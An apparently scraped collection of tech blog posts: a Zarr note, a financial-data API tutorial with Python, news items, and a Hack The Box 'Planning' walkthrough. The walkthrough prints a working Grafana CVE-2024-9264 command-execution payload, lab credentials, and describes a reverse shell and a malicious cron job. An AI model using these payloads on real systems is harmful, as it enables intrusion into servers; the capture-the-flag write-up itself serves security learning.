❌


Stop crashing your Python scripts: How to handle massive datasets on any laptop

25 January 2026 at 08:30

I started a climate modeling project assuming I'd be dealing with "large" datasets. Then I saw the actual size: 2 terabytes. I wrote a straightforward NumPy script, hit-run, and grabbed a coffee. Bad idea. When I came back, my machine had frozen. I restarted and tried a smaller slice. Same crash. My usual workflow wasn't going to work. After some trial and error, I eventually landed on Zarr, a Python library for chunked array storage. It let me process that entire 2TB dataset on my laptop without any crashes. Here's what I learned:


Argus: Python-Based Recon Toolkit Aims to Boost Security Intelligence

By: Divya
19 January 2026 at 02:54

Security researchers and penetration testers gain a comprehensive open-source reconnaissance platform with the release of Argus v2.0, a Python-based information gathering toolkit that consolidates 135 specialised modules into a unified command-line interface. The toolkit addresses the growing complexity of modern attack surface management by providing integrated access to network mapping, web application analysis, and threat […]

The post Argus: Python-Based Recon Toolkit Aims to Boost Security Intelligence appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Fundamental Data API: How to Extract Stock, ETF, Index, Mutual Fund, and Crypto Data (Step-by-Step…

16 January 2026 at 03:17

Fundamental Data API: How to Extract Stock, ETF, Index, Mutual Fund, and Crypto Data (Step-by-Step Guide)

If you’ve ever tried to build a serious financial product, screener, dashboard, or data pipeline, you already know the uncomfortable truth:

Getting financial data is easy.
Getting reliable fundamental data is not.

Most projects start the same way:

  • “Let’s pull data from Yahoo Finance.”
  • “This API is free, good enough for now.”
  • “We’ll fix it later.”

Then reality hits:

  • Endpoints break without warning
  • Scrapers get blocked
  • ETFs have no holdings
  • Indices have no historical constituents
  • Crypto has prices but zero context

At that point, the problem is no longer technical.
It’s architectural.

That’s why choosing the right Fundamental Data API matters.

What Is a Fundamental Data API?

A Fundamental Data API provides structured, long-term financial information about assets, not just prices.

Unlike market data APIs (OHLC, ticks, volume), fundamental data answers deeper questions:

  • What does this company actually do?
  • How does it make money?
  • What is inside this ETF?
  • Which companies were in this index in the past?
  • What is the real structure behind a crypto project?

What Counts as Fundamental Data?

Stocks

  • Company profile (sector, industry, country)
  • Financial statements (Income, Balance Sheet, Cash Flow)
  • Valuation ratios (P/E, margins, ROE, ROA)
  • Dividends and splits
  • Market capitalization and key metrics

ETFs

  • ETF metadata (issuer, category, AUM)
  • Holdings and weights
  • Sector and geographic exposure

Mutual Funds

  • Fund profile and strategy
  • Assets under management
  • Financial history

Indices

  • Constituents
  • Weights
  • Historical changes (critical for backtesting)

Crypto

  • Project metadata
  • Supply and market capitalization
  • Official links (website, GitHub, whitepaper)
  • Ecosystem statistics

What Is Derived Fundamental Data?

Derived data is what you build on top of fundamentals.

Examples:

  • Fundamental scoring models
  • Company or ETF rankings
  • Quality or value factors
  • Sector or exposure analysis

Derived data is only as good as the raw fundamental data behind it.
If the base data is inconsistent, your models will be too.

Why Popular Solutions Fail at Fundamental Data

Yahoo Finance (scraping)

  • ❌ No official API
  • ❌ Frequent HTML changes
  • ❌ Blocking and rate limits
  • ❌ Not suitable for commercial products

Trading-focused APIs (brokers)

  • ❌ Built for order execution
  • ❌ Limited or missing fundamentals
  • ❌ Poor ETF, index, and global coverage

Alpha Vantage

  • ✅ Easy to start
  • ❌ Strict rate limits
  • ❌ Limited ETF and index depth
  • ❌ Difficult to scale for real products

These tools work for experiments, not for systems.

Why Choose EODHD APIs for Fundamental Data

This is an architectural decision, not a feature checklist.

Key Advantages

  • Single fundamental endpoint for multiple asset classes
  • Global market coverage, not US-only
  • Consistent JSON structure, ideal for normalization
  • Native crypto fundamentals via a virtual exchange (.CC)
  • Designed for data products, ETL, and SaaS

EODHD APIs scale from scripts to full platforms without changing your data model.

Fundamental Data API Endpoint (Core Concept)

GET https://eodhd.com/api/fundamentals/{SYMBOL}?api_token=YOUR_API_KEY&fmt=json

Symbol examples:

  • Stock: AAPL.US
  • ETF: SPY.US
  • Mutual fund: SWPPX.US
  • Crypto: BTC-USD.CC

Python Setup (Reusable)

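import os

import requests

API_KEY = os.getenv("EODHD_TOKEN")  # read the token from the environment, never hard-code it
BASE_URL = "https://eodhd.com/api"


def get_fundamentals(symbol):
    """Fetch the fundamentals document for one symbol, e.g. AAPL.US."""
    url = f"{BASE_URL}/fundamentals/{symbol}"
    r = requests.get(
        url,
        params={"api_token": API_KEY, "fmt": "json"},
        timeout=30,  # fail instead of hanging on a stalled connection
    )
    r.raise_for_status()
    return r.json()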

How to Extract Stock Fundamental Data Using an API

stock = get_fundamentals("AAPL.US")
print(stock["General"]["Name"])
print(stock["Highlights"]["MarketCapitalization"])
print(stock["Valuation"]["TrailingPE"])

Use cases

  • Stock screeners
  • Valuation models
  • Fundamental scoring systems

How to Extract ETF Data Using an API

ETFs require look-through analysis, not just price tracking.

etf = get_fundamentals("SPY.US")
print(etf["General"]["Name"])
print(etf["ETF_Data"]["Holdings"].keys())

Use cases

  • Portfolio exposure analysis
  • Backtesting without hidden bias
  • Wealth and advisory platforms

How to Extract Mutual Fund Data Using an API

fund = get_fundamentals("SWPPX.US")
print(fund["General"]["Name"])

Use cases

  • Fund comparison tools
  • Automated reporting
  • Wealth management dashboards

How to Extract Index Data Using an API

Indices are not just numbers.

Correct index analysis requires:

  • Constituents
  • Weights
  • Historical changes

Using current constituents for past analysis introduces look-ahead bias.

Recommended workflow

  1. Pull index constituents (current or historical)
  2. Enrich each component with fundamentals
  3. Compute derived metrics

This is essential for:

  • Quant models
  • Factor research
  • Long-term backtesting

How to Extract Crypto Fundamental Data Using an API

Crypto fundamentals are project-level, not just price-based.

btc = get_fundamentals("BTC-USD.CC")
print(btc["General"]["Name"])
print(btc["Statistics"]["MarketCapitalization"])
print(btc["Resources"]["Links"]["source_code"])

Use cases

  • Crypto research dashboards
  • Project comparison tools
  • Hybrid equity + crypto platforms

How to Integrate Fundamental Data Into Real Systems

Typical integrations:

  • ETL → PostgreSQL, BigQuery
  • Automation → n8n, Airflow
  • Dashboards → Streamlit, Metabase
  • Reporting → Google Sheets, Notion

Recommended architecture

  1. Fetch fundamentals
  2. Cache by symbol (daily or weekly)
  3. Normalize only required fields
  4. Compute derived metrics
  5. Serve data to applications
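
The setup function and the five architecture steps above, as an added example (not code from the original article or from EODHD): it validates the symbol before it reaches the URL path, caches by symbol, normalizes the three fields the article reads, and strips the api_token from error text, because raise_for_status() puts the full request URL in its message. The symbol pattern, the FundamentalsCache class, the injected fetch callable and the sample response are assumptions of this example.

```python
import re
import time

# Assumed symbol shape, modelled on the page's examples (AAPL.US, BTC-USD.CC).
SYMBOL_RE = re.compile(r"[A-Z0-9-]{1,15}\.[A-Z]{2,6}")


def validate_symbol(symbol):
    """Reject input that could change the URL path or query ('/', '..', '?')."""
    if not isinstance(symbol, str) or not SYMBOL_RE.fullmatch(symbol):
        raise ValueError(f"rejected symbol: {symbol!r}")
    return symbol


def redact_token(text):
    """Mask api_token values before a URL or error message reaches a log."""
    return re.sub(r"(api_token=)[^&\s]+", r"\1***", text)


def normalize(raw):
    """Step 3: keep only the required fields; step 4: add a derived metric."""
    pe = (raw.get("Valuation") or {}).get("TrailingPE")
    usable_pe = isinstance(pe, (int, float)) and pe > 0
    return {
        "name": (raw.get("General") or {}).get("Name"),
        "market_cap": (raw.get("Highlights") or {}).get("MarketCapitalization"),
        "trailing_pe": pe,
        # Earnings yield is the inverse of P/E; undefined for missing or <= 0.
        "earnings_yield": round(1 / pe, 4) if usable_pe else None,
    }


class FundamentalsCache:
    """Steps 1-2: fetch through an injected callable and cache by symbol."""

    def __init__(self, fetch, ttl_seconds=86400, clock=time.time):
        self._fetch = fetch
        self._ttl = ttl_seconds
        self._clock = clock
        self._store = {}

    def get(self, symbol):
        symbol = validate_symbol(symbol)
        hit = self._store.get(symbol)
        if hit and self._clock() - hit[0] < self._ttl:
            return hit[1]
        try:
            raw = self._fetch(symbol)
        except Exception as exc:
            # requests puts the full URL, token included, in HTTPError text;
            # re-raise a redacted message and suppress the chained exception.
            raise RuntimeError(redact_token(str(exc))) from None
        record = normalize(raw)
        self._store[symbol] = (self._clock(), record)
        return record


# Constructed response carrying only the fields the page reads for a stock.
SAMPLE = {
    "General": {"Name": "Example Corp"},
    "Highlights": {"MarketCapitalization": 1000000000},
    "Valuation": {"TrailingPE": 25.0},
}

if __name__ == "__main__":
    cache = FundamentalsCache(lambda symbol: SAMPLE)  # stand-in for the HTTP call
    print(cache.get("AAPL.US"))
    print(redact_token("for url: https://eodhd.com/api/fundamentals/AAPL.US?api_token=abc&fmt=json"))
```

In real use, pass the article's get_fundamentals as the fetch callable.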

Pros and Cons of a Professional Fundamental Data API

Pros

  • Stable and structured data
  • Multi-asset support
  • Scales to production
  • Ideal for derived analytics

Cons

  • Requires data modeling
  • Not a copy-paste shortcut

That’s a feature, not a drawback.

FAQs: Fundamental Data APIs

What is fundamental data?

Economic and structural information about an asset, not its price.

What is derived fundamental data?

Metrics or scores calculated from raw fundamental data.

Can I combine stocks, ETFs, indices, and crypto?

Yes. That’s one of the main strengths of EODHD APIs.

How often should I update fundamental data?

  • Stocks: quarterly
  • ETFs and funds: monthly
  • Crypto: more frequently

Is fundamental data suitable for SaaS products?

Yes, when sourced from an official and stable API.

If you’re looking for a Fundamental Data API that lets you:

  • extract stock, ETF, mutual fund, index, and crypto data
  • build reliable derived financial data
  • scale from scripts to real products

Then EODHD APIs provide a clean and professional foundation.


Fundamental Data API: How to Extract Stock, ETF, Index, Mutual Fund, and Crypto Data (Step-by-Step… was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.

12 Most Popular Deep Learning Libraries 2026

By: Balaji
14 January 2026 at 02:25

Deep learning libraries are essentially sets of functions and routines written in a given programming language. A large set of deep learning libraries can make it much simpler for data engineers, data scientists and developers to perform tasks of any complexity without having to rewrite vast lines of code. Artificial intelligence (AI) has been rapidly […]

The post 12 Most Popular Deep Learning Libraries 2026 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Anthropic Invests $1.5 Million in the Python Software Foundation and Open Source Security

By: msmash
13 January 2026 at 12:25
Python Software Foundation: We are thrilled to announce that Anthropic has entered into a two-year partnership with the Python Software Foundation (PSF) to contribute a landmark total of $1.5 million to support the foundation's work, with an emphasis on Python ecosystem security. This investment will enable the PSF to make crucial security advances to CPython and the Python Package Index (PyPI) benefiting all users, and it will also sustain the foundation's core work supporting the Python language, ecosystem, and global community. Anthropic's funds will enable the PSF to make progress on our security roadmap, including work designed to protect millions of PyPI users from attempted supply-chain attacks. Planned projects include creating new tools for automated proactive review of all packages uploaded to PyPI, improving on the current process of reactive-only review. We intend to create a new dataset of known malware that will allow us to design these novel tools, relying on capability analysis. One of the advantages of this project is that we expect the outputs we develop to be transferable to all open source package repositories. As a result, this work has the potential to ultimately improve security across multiple open source ecosystems, starting with the Python ecosystem.

Read more of this story at Slashdot.

HORUS Framework: A Rust Robotics Library

9 January 2026 at 04:00
Detail of Horus's face, from a statue of Horus and Set placing the crown of Upper Egypt on the head of Ramesses III. Twentieth Dynasty, early 12th century BC.

[neos-builder] wrote in to let us know about their innovation: the HORUS Framework (Hybrid Optimized Robotics Unified System), a production-grade robotics framework built in Rust for real-time performance and memory safety.

This is a batteries included system which aims to have everything you might need available out of the box. [neos-builder] said their vision is to create a robotics framework that is “thick” as a whole (we can’t avoid this as the tools, drivers, etc. make it impossible to be slim and fit everyone’s needs), but modular by choice.

[neos-builder] goes on to say that HORUS aims to provide developers an interface where they can focus on writing algorithms and logic, not on setting up their environments and solving configuration issues and resolving DLL hell. With HORUS, instead of writing one monolithic program, you build independent nodes, connected by topics, which are run by a scheduler. If you’d like to know more, the documentation is extensive.

The list of features is far too long for us to repeat here, but one cool feature in addition to the real-time performance and modular design that jumped out at us was this system’s ability to process six million messages per second, sustained. That’s a lot of messages! Another neat feature is the system’s ability to “freeze” the environment, thereby assuring everyone on the team is using the same version of included components, no more “but it works on my machine!” And we should probably let you know that Python integration is a feature, connected by shared-memory inter-process communication (IPC).

If you’re interested in robotics and/or real-time systems you should definitely be aware of HORUS. Thanks to [neos-builder] for writing in about it. If you’re interested in real-time systems you might like to read Real-Time BART In A Box Smaller Than Your Coffee Mug and Real-Time Beamforming With Software-Defined Radio.

Hack The Box: Planning Machine Walkthrough – Easy Difficulty

By: darknite
13 September 2025 at 10:58

Introduction to Planning:

In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:

User Flag:

During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264, a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.

Root Flag:

Once on the host, I discovered the Crontab-UI service, a web-based tool for managing cron jobs, running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.68

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

Analysis:

  • Port 22 (SSH): Secure Shell service for remote access.
  • Port 80 (HTTP): Web server running Apache.

Web Application Exploration:

The website for Edukate appears to be a standard educational platform.

What is Edukate?

Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.

Source: themewagon/Edukate

No usable elements are present here.

Nothing noteworthy here either.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

Gobuster Output:

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

Analysis:

Discovery: grafana.planning.htb

  • Gobuster found a valid virtual host: grafana.planning.htb.
  • This is likely an internal service meant for the organization’s team, not a public endpoint.
  • Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.

Grafana Application

The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.

We should be able to log in using the credentials provided by Hack The Box.

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

We need to inspect the traffic using Burp Suite.

First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.

We successfully gained access to the Grafana dashboard.

We also confirmed that the Grafana instance is running version 11.0.0

There are numerous tokens being rotated here.

This is what the response looks like in Burp Suite.

Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE

This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).

Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.

Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.

Let’s search Google for potential exploits targeting Grafana v11.0.0.

This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.

We successfully retrieved the /etc/passwd file.

When we ran the whoami command, it returned root, which is unexpected.

Let’s set up our listener.

Unfortunately, we were unable to execute the command due to an error.

As suspected, this is running inside a Docker container.

The environment variables reveal the Grafana admin credentials:

  • GF_SECURITY_ADMIN_USER=enzo
  • GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.

Exploit CVE-2024-9264 using Burp Suite.

The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.

If the full path is not specified, it responds with a “Not Found” message.

However, attempting to execute the full path results in an “Unauthorized” response.

It’s still the same; we need to send the JSON data here.

After replacing the token, it worked.

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.

Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.
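
A defender-side view of the request above, as an added example that is not part of the original walkthrough: it parses bodies sent to api/ds/query and flags SQL Expression queries that stack statements, install or load a DuckDB extension, or call a file-reading table function. It assumes request bodies are captured at a reverse proxy or WAF; the rule set, function names and sample requests are constructed for illustration.

```python
import json
import re

# Heuristics drawn from the payload above; rule names are this example's own.
RULES = [
    ("stacked-statements", re.compile(r";\s*\S")),
    ("extension-install", re.compile(r"\binstall\s+\w+", re.I)),
    ("extension-load", re.compile(r"\bload\s+\w+", re.I)),
    ("shellfs", re.compile(r"\bshellfs\b", re.I)),
    ("file-table-function", re.compile(r"\bread_(csv|text|blob|json|parquet)\w*\s*\(", re.I)),
]


def sql_expressions(body):
    """Yield (refId, expression) for every SQL Expression query in a body."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return  # not JSON: nothing to inspect
    queries = doc.get("queries") if isinstance(doc, dict) else None
    for query in queries if isinstance(queries, list) else []:
        if not isinstance(query, dict):
            continue
        ds = query.get("datasource")
        is_expr = isinstance(ds, dict) and ds.get("type") == "__expr__"
        if is_expr and query.get("type") == "sql":
            yield query.get("refId"), str(query.get("expression", ""))


def inspect_request(method, path, body):
    """Return one finding per SQL Expression query sent to /api/ds/query."""
    endpoint = path.split("?", 1)[0].rstrip("/")
    if method.upper() != "POST" or not endpoint.endswith("/api/ds/query"):
        return []
    findings = []
    for ref_id, expression in sql_expressions(body):
        rules = [name for name, rx in RULES if rx.search(expression)]
        findings.append({
            "refId": ref_id,
            # The feature is experimental, so any use is worth recording.
            "severity": "high" if rules else "info",
            "rules": rules,
        })
    return findings


def build_body(expression):
    """Constructed request body with the same shape as the one shown above."""
    return json.dumps({
        "from": "1729313027261",
        "to": "1729334627261",
        "queries": [{
            "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
            "expression": expression,
            "refId": "B",
            "type": "sql",
        }],
    })


# Constructed samples: extension loading as in the payload above, and a benign query.
SAMPLES = [
    ("POST", "/api/ds/query", build_body("SELECT 1; install shellfs from community; LOAD shellfs; SELECT 1")),
    ("POST", "/api/ds/query?requestId=constructed", build_body("SELECT time, value FROM A")),
    ("GET", "/api/dashboards/home", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body))
```

The stacked-statement rule is a heuristic and will also fire on a semicolon inside a string literal, so treat it as a triage signal alongside the extension and file-function rules.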

Let’s set up our listener to catch the reverse shell.

Use this SQL command to execute the bash script.

It’s hanging, which is a good sign that the payload is executing.

We successfully received a reverse shell connection.

We attempted to switch to the enzo user with su enzo, but it didn’t work.

SSH worked perfectly and allowed us to log in successfully.

We were able to read the user flag by running cat user.txt.

Escalate To Root Privileges Access

Privilege Escalation:

Locate the database file.

We discovered /opt/crrontabs/crontab.db.

The password for root_grafana is P4ssw0rdS0pRi0T3c.

Port 8000 is open here, which is unusual.

Let’s set up port forwarding for port 8000.

We need to provide the credentials to log in.

We need to use the credentials we discovered earlier to log in.

It turned out to be a cron jobs management interface.

What is Crontab-UI?

Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.

We need to create a new cron job command.

The shell.sh file contains the reverse shell that will connect back to us.

We will use curl to fetch the file, as demonstrated earlier.

The file was transferred successfully, as expected.

We were able to access the root shell and read the root flag by running cat root.txt.

The post Hack The Box: Planning Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

SysPwn - App Launcher

By: hoek
16 August 2024 at 06:18

Everyone knows that I am not a programmer, but yesterday was a holiday in my country and I was doing some tidying up of my notes and todo lists, and one entry was quite old and I thought, ok, it is probably time to complete this task. Holy moly, but how does that relate to programming? Let’s start at the beginning.

digital world.local: Vengeance Walkthrough – OSCP Way

By: Jo
8 October 2022 at 13:13
Vengeance is one of the digital world.local series which makes vulnerable boxes closer to OSCP labs. This box has a lot of services and there could be multiple ways to exploit this. Below is what I have tried. Lab requirement: 1. Kali VM 2. Download Vengeance: https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704 3. Some patience. I have written article already […]